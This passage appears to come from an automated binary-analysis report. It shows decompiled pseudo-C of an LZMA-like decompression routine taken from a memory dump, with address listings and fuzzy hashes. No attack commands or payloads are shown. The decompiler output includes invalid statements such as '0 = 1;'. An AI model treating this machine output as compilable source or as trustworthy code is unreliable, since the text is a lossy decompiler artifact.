                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t414 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t414;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            												__eflags =  *(__ebp - 0x30);
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												 *(__ebp - 0x14) = _t414;
                                            												if( *(__ebp - 0x30) > 0) {
                                            													continue;
                                            												} else {
                                            													L127:
                                            													L81:
                                            													 *(__ebp - 0x88) = 2;
                                            													goto L1;
                                            												}
                                            											}
                                            											L167:
                                            											 *(__ebp - 0x88) = 0x1c;
                                            											goto L170;
                                            									}
                                            								}
                                            								L171:
                                            								_t539 = _t538 | 0xffffffff;
                                            								goto L172;
                                            							}
                                            						}
                                            					}
                                            				}
                                            			}















                                            0x00406231
                                            0x00406234
                                            0x00406237
                                            0x00406239
                                            0x0040623a
                                            0x0040623d
                                            0x00000000
                                            0x0040623d
                                            0x00000000
                                            0x00406473
                                            0x00406473
                                            0x00406477
                                            0x00406495
                                            0x00406495
                                            0x00406498
                                            0x0040649f
                                            0x004064a2
                                            0x004064a5
                                            0x004064a8
                                            0x004064ab
                                            0x004064ae
                                            0x004064b0
                                            0x004064b7
                                            0x004064b8
                                            0x004064ba
                                            0x004064bd
                                            0x004064c0
                                            0x004064c3
                                            0x004064c3
                                            0x004064c8
                                            0x00000000
                                            0x004064c8
                                            0x00406479
                                            0x00406479
                                            0x0040647c
                                            0x0040647f
                                            0x00406489
                                            0x00000000
                                            0x00000000
                                            0x004064dd
                                            0x004064dd
                                            0x004064e1
                                            0x00406504
                                            0x00406507
                                            0x0040650a
                                            0x00406514
                                            0x004064e3
                                            0x004064e3
                                            0x004064e6
                                            0x004064e9
                                            0x004064ec
                                            0x004064f9
                                            0x004064fc
                                            0x004064fc
                                            0x00000000
                                            0x00000000
                                            0x00406520
                                            0x00406520
                                            0x00406524
                                            0x00000000
                                            0x00000000
                                            0x0040652a
                                            0x0040652a
                                            0x0040652e
                                            0x00000000
                                            0x00000000
                                            0x00406534
                                            0x00406534
                                            0x00406536
                                            0x0040653a
                                            0x0040653a
                                            0x0040653d
                                            0x00406541
                                            0x00000000
                                            0x00000000
                                            0x00406591
                                            0x00406591
                                            0x00406595
                                            0x0040659c
                                            0x0040659c
                                            0x0040659f
                                            0x004065a2
                                            0x004065ac
                                            0x00000000
                                            0x004065ac
                                            0x00406597
                                            0x00406597
                                            0x00000000
                                            0x00000000
                                            0x004065b8
                                            0x004065b8
                                            0x004065bc
                                            0x004065c3
                                            0x004065c6
                                            0x004065c9
                                            0x004065be
                                            0x004065be
                                            0x004065be
                                            0x004065cc
                                            0x004065cf
                                            0x004065d2
                                            0x004065d2
                                            0x004065d5
                                            0x004065d8
                                            0x004065db
                                            0x004065db
                                            0x004065de
                                            0x004065e5
                                            0x004065ea
                                            0x00000000
                                            0x00000000
                                            0x00406678
                                            0x00406678
                                            0x0040667c
                                            0x00406a1a
                                            0x00406a1a
                                            0x00000000
                                            0x00406a1a
                                            0x00406682
                                            0x00406682
                                            0x00406685
                                            0x00406688
                                            0x0040668c
                                            0x0040668f
                                            0x00406695
                                            0x00406697
                                            0x00406697
                                            0x00406697
                                            0x0040669a
                                            0x0040669d
                                            0x00000000
                                            0x00000000
                                            0x0040626d
                                            0x0040626d
                                            0x00406271
                                            0x004069de
                                            0x004069de
                                            0x00000000
                                            0x004069de
                                            0x00406277
                                            0x00406277
                                            0x0040627a
                                            0x0040627d
                                            0x00406281
                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00406292
                                            0x00406292
                                            0x00406295
                                            0x00406298
                                            0x00000000
                                            0x00000000
                                            0x0040629e
                                            0x0040629e
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x004064cb
                                            0x004064cb
                                            0x004064ce
                                            0x00000000
                                            0x00000000
                                            0x0040680a
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406810
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00406912
                                            0x004068cd
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x004068c2
                                            0x00000000
                                            0x004065f2
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00406912
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00406637
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d0
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                            • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                            • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                            • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E0040680A() {
                                            				void _t533;
                                            				signed int _t534;
                                            				signed int _t535;
                                            				signed int* _t605;
                                            				void* _t612;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t612 - 0x40) != 0) {
                                            						 *(_t612 - 0x84) = 0x13;
                                            						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                            						goto L132;
                                            					} else {
                                            						__eax =  *(__ebp - 0x4c);
                                            						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            						__ecx =  *(__ebp - 0x58);
                                            						__eax =  *(__ebp - 0x4c) << 4;
                                            						__eax =  *(__ebp - 0x58) + __eax + 4;
                                            						L130:
                                            						 *(__ebp - 0x58) = __eax;
                                            						 *(__ebp - 0x40) = 3;
                                            						L144:
                                            						 *(__ebp - 0x7c) = 0x14;
                                            						L145:
                                            						__eax =  *(__ebp - 0x40);
                                            						 *(__ebp - 0x50) = 1;
                                            						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            						L149:
                                            						if( *(__ebp - 0x48) <= 0) {
                                            							__ecx =  *(__ebp - 0x40);
                                            							__ebx =  *(__ebp - 0x50);
                                            							0 = 1;
                                            							__eax = 1 << __cl;
                                            							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            							__eax =  *(__ebp - 0x7c);
                                            							 *(__ebp - 0x44) = __ebx;
                                            							while(1) {
                                            								L140:
                                            								 *(_t612 - 0x88) = _t533;
                                            								while(1) {
                                            									L1:
                                            									_t534 =  *(_t612 - 0x88);
                                            									if(_t534 > 0x1c) {
                                            										break;
                                            									}
                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
                                            										case 0:
                                            											if( *(_t612 - 0x6c) == 0) {
                                            												goto L170;
                                            											}
                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                            											_t534 =  *( *(_t612 - 0x70));
                                            											if(_t534 > 0xe1) {
                                            												goto L171;
                                            											}
                                            											_t538 = _t534 & 0x000000ff;
                                            											_push(0x2d);
                                            											asm("cdq");
                                            											_pop(_t569);
                                            											_push(9);
                                            											_pop(_t570);
                                            											_t608 = _t538 / _t569;
                                            											_t540 = _t538 % _t569 & 0x000000ff;
                                            											asm("cdq");
                                            											_t603 = _t540 % _t570 & 0x000000ff;
                                            											 *(_t612 - 0x3c) = _t603;
                                            											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                            											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                            											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                            											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                            												L10:
                                            												if(_t611 == 0) {
                                            													L12:
                                            													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                            													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                            													goto L15;
                                            												} else {
                                            													goto L11;
                                            												}
                                            												do {
                                            													L11:
                                            													_t611 = _t611 - 1;
                                            													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                            												} while (_t611 != 0);
                                            												goto L12;
                                            											}
                                            											if( *(_t612 - 4) != 0) {
                                            												GlobalFree( *(_t612 - 4));
                                            											}
                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                            											 *(_t612 - 4) = _t534;
                                            											if(_t534 == 0) {
                                            												goto L171;
                                            											} else {
                                            												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                            												goto L10;
                                            											}
                                            										case 1:
                                            											L13:
                                            											__eflags =  *(_t612 - 0x6c);
                                            											if( *(_t612 - 0x6c) == 0) {
                                            												 *(_t612 - 0x88) = 1;
                                            												goto L170;
                                            											}
                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                            											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                            											_t45 = _t612 - 0x48;
                                            											 *_t45 =  *(_t612 - 0x48) + 1;
                                            											__eflags =  *_t45;
                                            											L15:
                                            											if( *(_t612 - 0x48) < 4) {
                                            												goto L13;
                                            											}
                                            											_t546 =  *(_t612 - 0x40);
                                            											if(_t546 ==  *(_t612 - 0x74)) {
                                            												L20:
                                            												 *(_t612 - 0x48) = 5;
                                            												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                            												goto L23;
                                            											}
                                            											 *(_t612 - 0x74) = _t546;
                                            											if( *(_t612 - 8) != 0) {
                                            												GlobalFree( *(_t612 - 8)); // executed
                                            											}
                                            											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                            											 *(_t612 - 8) = _t534;
                                            											if(_t534 == 0) {
                                            												goto L171;
                                            											} else {
                                            												goto L20;
                                            											}
                                            										case 2:
                                            											L24:
                                            											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                            											 *(_t612 - 0x84) = 6;
                                            											 *(_t612 - 0x4c) = _t553;
                                            											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                            											goto L132;
                                            										case 3:
                                            											L21:
                                            											__eflags =  *(_t612 - 0x6c);
                                            											if( *(_t612 - 0x6c) == 0) {
                                            												 *(_t612 - 0x88) = 3;
                                            												goto L170;
                                            											}
                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                            											_t67 = _t612 - 0x70;
                                            											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                            											__eflags =  *_t67;
                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                            											L23:
                                            											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                            											if( *(_t612 - 0x48) != 0) {
                                            												goto L21;
                                            											}
                                            											goto L24;
                                            										case 4:
                                            											L133:
                                            											_t531 =  *_t605;
                                            											_t588 = _t531 & 0x0000ffff;
                                            											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                            											if( *(_t612 - 0xc) >= _t564) {
                                            												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                            												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                            												 *(_t612 - 0x40) = 1;
                                            												_t532 = _t531 - (_t531 >> 5);
                                            												__eflags = _t532;
                                            												 *_t605 = _t532;
                                            											} else {
                                            												 *(_t612 - 0x10) = _t564;
                                            												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                            												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                            											}
                                            											if( *(_t612 - 0x10) >= 0x1000000) {
                                            												goto L139;
                                            											} else {
                                            												goto L137;
                                            											}
                                            										case 5:
                                            											L137:
                                            											if( *(_t612 - 0x6c) == 0) {
                                            												 *(_t612 - 0x88) = 5;
                                            												goto L170;
                                            											}
                                            											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                            											L139:
                                            											_t533 =  *(_t612 - 0x84);
                                            											goto L140;
                                            										case 6:
                                            											__edx = 0;
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) = 1;
                                            												 *(__ebp - 0x84) = 7;
                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            												goto L132;
                                            											}
                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            											__esi =  *(__ebp - 0x60);
                                            											__cl = 8;
                                            											__cl = 8 -  *(__ebp - 0x3c);
                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            											__ecx =  *(__ebp - 0x3c);
                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            											__ecx =  *(__ebp - 4);
                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            											__eflags =  *(__ebp - 0x38) - 4;
                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											if( *(__ebp - 0x38) >= 4) {
                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                            												if( *(__ebp - 0x38) >= 0xa) {
                                            													_t98 = __ebp - 0x38;
                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                            													__eflags =  *_t98;
                                            												} else {
                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            												}
                                            											} else {
                                            												 *(__ebp - 0x38) = 0;
                                            											}
                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                            											if( *(__ebp - 0x34) == __edx) {
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												goto L61;
                                            											} else {
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__ecx =  *(__ebp - 8);
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            												goto L41;
                                            											}
                                            										case 7:
                                            											__eflags =  *(__ebp - 0x40) - 1;
                                            											if( *(__ebp - 0x40) != 1) {
                                            												__eax =  *(__ebp - 0x24);
                                            												 *(__ebp - 0x80) = 0x16;
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												__eax =  *(__ebp - 0x2c);
                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            												__eax =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 4) + 0x664;
                                            												__eflags = __eax;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L69;
                                            											}
                                            											__eax =  *(__ebp - 4);
                                            											__ecx =  *(__ebp - 0x38);
                                            											 *(__ebp - 0x84) = 8;
                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            											goto L132;
                                            										case 8:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xa;
                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            											} else {
                                            												__eax =  *(__ebp - 0x38);
                                            												__ecx =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                            												 *(__ebp - 0x84) = 9;
                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            											}
                                            											goto L132;
                                            										case 9:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												goto L90;
                                            											}
                                            											__eflags =  *(__ebp - 0x60);
                                            											if( *(__ebp - 0x60) == 0) {
                                            												goto L171;
                                            											}
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                            											__eflags = _t259;
                                            											0 | _t259 = _t259 + _t259 + 9;
                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                            											goto L76;
                                            										case 0xa:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xb;
                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            												goto L132;
                                            											}
                                            											__eax =  *(__ebp - 0x28);
                                            											goto L89;
                                            										case 0xb:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__ecx =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x20);
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            											} else {
                                            												__eax =  *(__ebp - 0x24);
                                            											}
                                            											__ecx =  *(__ebp - 0x28);
                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            											L89:
                                            											__ecx =  *(__ebp - 0x2c);
                                            											 *(__ebp - 0x2c) = __eax;
                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            											L90:
                                            											__eax =  *(__ebp - 4);
                                            											 *(__ebp - 0x80) = 0x15;
                                            											__eax =  *(__ebp - 4) + 0xa68;
                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                            											goto L69;
                                            										case 0xc:
                                            											L100:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xc;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t335 = __ebp - 0x70;
                                            											 *_t335 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t335;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											__eax =  *(__ebp - 0x2c);
                                            											goto L102;
                                            										case 0xd:
                                            											L37:
                                            											__eflags =  *(__ebp - 0x6c);
                                            											if( *(__ebp - 0x6c) == 0) {
                                            												 *(__ebp - 0x88) = 0xd;
                                            												goto L170;
                                            											}
                                            											__ecx =  *(__ebp - 0x70);
                                            											__eax =  *(__ebp - 0xc);
                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											_t122 = __ebp - 0x70;
                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                            											__eflags =  *_t122;
                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            											L39:
                                            											__eax =  *(__ebp - 0x40);
                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            												goto L48;
                                            											}
                                            											__eflags = __ebx - 0x100;
